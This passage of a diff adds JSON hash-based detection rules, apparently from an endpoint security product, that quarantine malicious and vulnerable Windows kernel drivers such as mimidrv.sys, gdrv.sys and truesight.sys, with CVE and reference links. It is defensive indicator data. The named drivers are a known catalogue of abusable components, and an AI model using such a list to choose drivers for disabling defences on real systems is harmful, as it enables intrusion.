+ "creation_date": "2026-03-23T11:45:29.981747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e",
+ "comment": "Malicious Kernel Driver (aka daxin_blank4.sys) [https://www.loldrivers.io/drivers/f8bddc8b-49b9-41f7-a877-d15ec3f174f9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a608dd0-ae3f-58a1-97cd-df397c6123f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819930Z",
+ "creation_date": "2026-03-23T11:45:30.819932Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819937Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "647f209aac750ba26bda9836afa5ef1370e4a62b5c331606086b1c4c92e10841",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a675fe1-94f8-5d56-a4f5-ce1e2c156487",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818416Z",
+ "creation_date": "2026-03-23T11:45:30.818418Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51f002ee44e46889cf5b99a724dd10cc2bd3e22545e2a2cb3bd6b1dd3af5ba11",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a716bec-b6e8-5ab9-b90b-7f3111948cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974575Z",
+ "creation_date": "2026-03-23T11:45:29.974577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bea1a92c747c203cd3e370f422ed6023787817a5495385e5ca473ef59396a2e",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a7df18d-1b7d-517a-b992-0deae3d4c736",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824562Z",
+ "creation_date": "2026-03-23T11:45:30.824564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a05a5e4ef61ca36ec26c307986f97ddacdf0b8c6d49ba585af7f6c1418e15580",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a875926-b743-5bf0-95bc-90d0d60352a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474546Z",
+ "creation_date": "2026-03-23T11:45:31.474550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fc59fa28750eca8c9b1d0430f8dae06fb47a23ae5ccaf00382ff39404dd0ce3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a87b0e1-2b4b-5f7f-b853-ca10d1ee5d40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489074Z",
+ "creation_date": "2026-03-23T11:45:31.489076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b300090af83ca99586f57e7866152c457ff04845af365b1b556f26b827f07c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a8d8298-13c9-555f-8d45-667e01396666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465029Z",
+ "creation_date": "2026-03-23T11:45:30.465032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a901fd4-accf-5903-9b5f-842ca54d511e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146583Z",
+ "creation_date": "2026-03-23T11:45:31.146585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2379c61d731ca8c5b2e37b59829ab936cb89b399dcd0704bf3e5b6623a94aa74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a94a125-7f03-5ae0-8b14-aa7ad9fe6e7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500761Z",
+ "creation_date": "2026-03-23T11:45:31.500765Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500773Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b13a2984b2010516a393de79655ee50b11c820e81c3d48c77994f6ae158e264e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a975e71-e4b7-5ae0-a002-bf1d7a4df225",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472664Z",
+ "creation_date": "2026-03-23T11:45:30.472668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e92aacd60fca1f09b7257e62caf0692794f5d741c5d1eec89d841e87f2c359c",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5a9e8640-da7b-509c-9409-e448da121355",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472349Z",
+ "creation_date": "2026-03-23T11:45:31.472352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472360Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc21d405f62d38621816523ef0d56479bcc72b7713a133d14b304db037727f74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5aa9af00-e2ad-54f6-a877-2d0fe8fa2861",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472438Z",
+ "creation_date": "2026-03-23T11:45:31.472441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472450Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e80b9e2396917ea371114060a132279a1392cfa311c0980b96b5ba0e523e047f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ab4f810-e734-5349-98f1-78e936ac28ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828472Z",
+ "creation_date": "2026-03-23T11:45:30.828474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c01f61d0a03d2a02107e921f8f23884cf053c5f5be991b5136d6958ffd94863",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ab8913d-ade1-5174-8bac-5f220c4aca6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981908Z",
+ "creation_date": "2026-03-23T11:45:29.981910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8",
+ "comment": "Vulnerable Kernel Driver (aka b1.sys) [https://www.loldrivers.io/drivers/69b924ab-2e4a-4eae-8091-4151c238136e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ab8d85b-61af-50a7-bffc-510e23430e23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609482Z",
+ "creation_date": "2026-03-23T11:45:29.609488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb0063e65c44da66d705d25121af09b641070219c174f5d83e288ba8fe59e46f",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5abb8057-4929-5291-8210-9bf1c36b9d57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811524Z",
+ "creation_date": "2026-03-23T11:45:31.811526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "701a88235e70f19461935f0fbfd4bcecdf654c0b91b20b0a968b0e7d9b40713c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ad75cc5-a900-5a39-ac3c-59098e7bf83a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620693Z",
+ "creation_date": "2026-03-23T11:45:29.620695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620700Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5add6a82-ff79-568a-80d8-0c2de6a824dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821499Z",
+ "creation_date": "2026-03-23T11:45:30.821503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13ae3081393f8100cc491ebb88ba58f0491b3550787cf3fd25a73aa7ca0290d9",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5aedb076-01ca-5528-a5c1-2c15cbf4fd6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148154Z",
+ "creation_date": "2026-03-23T11:45:31.148157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37f755dcb733a06bbc90206da0ca94078e237cb0602d4050f7679946b6f93738",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5af9d7b9-034b-554e-9302-ac2c8e3e21bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470461Z",
+ "creation_date": "2026-03-23T11:45:30.470465Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9718a5e78f5015a7a9f66c33ae31a6df37535f33039380c6edc103e3a9dbc5ab",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5afc9956-b8ac-543f-979a-c4031cfa1d67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813195Z",
+ "creation_date": "2026-03-23T11:45:31.813198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd717e3f0cbdcd839a816d133f07b331f6219259071e33fb8ba7f0a6258d56a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5afc9eaf-a71f-5a70-a191-06b6cefe6be6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155906Z",
+ "creation_date": "2026-03-23T11:45:31.155908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99a7c55161c2d016cc3eb8ce3265adeddb877692642940207ca5de6a703c0a19",
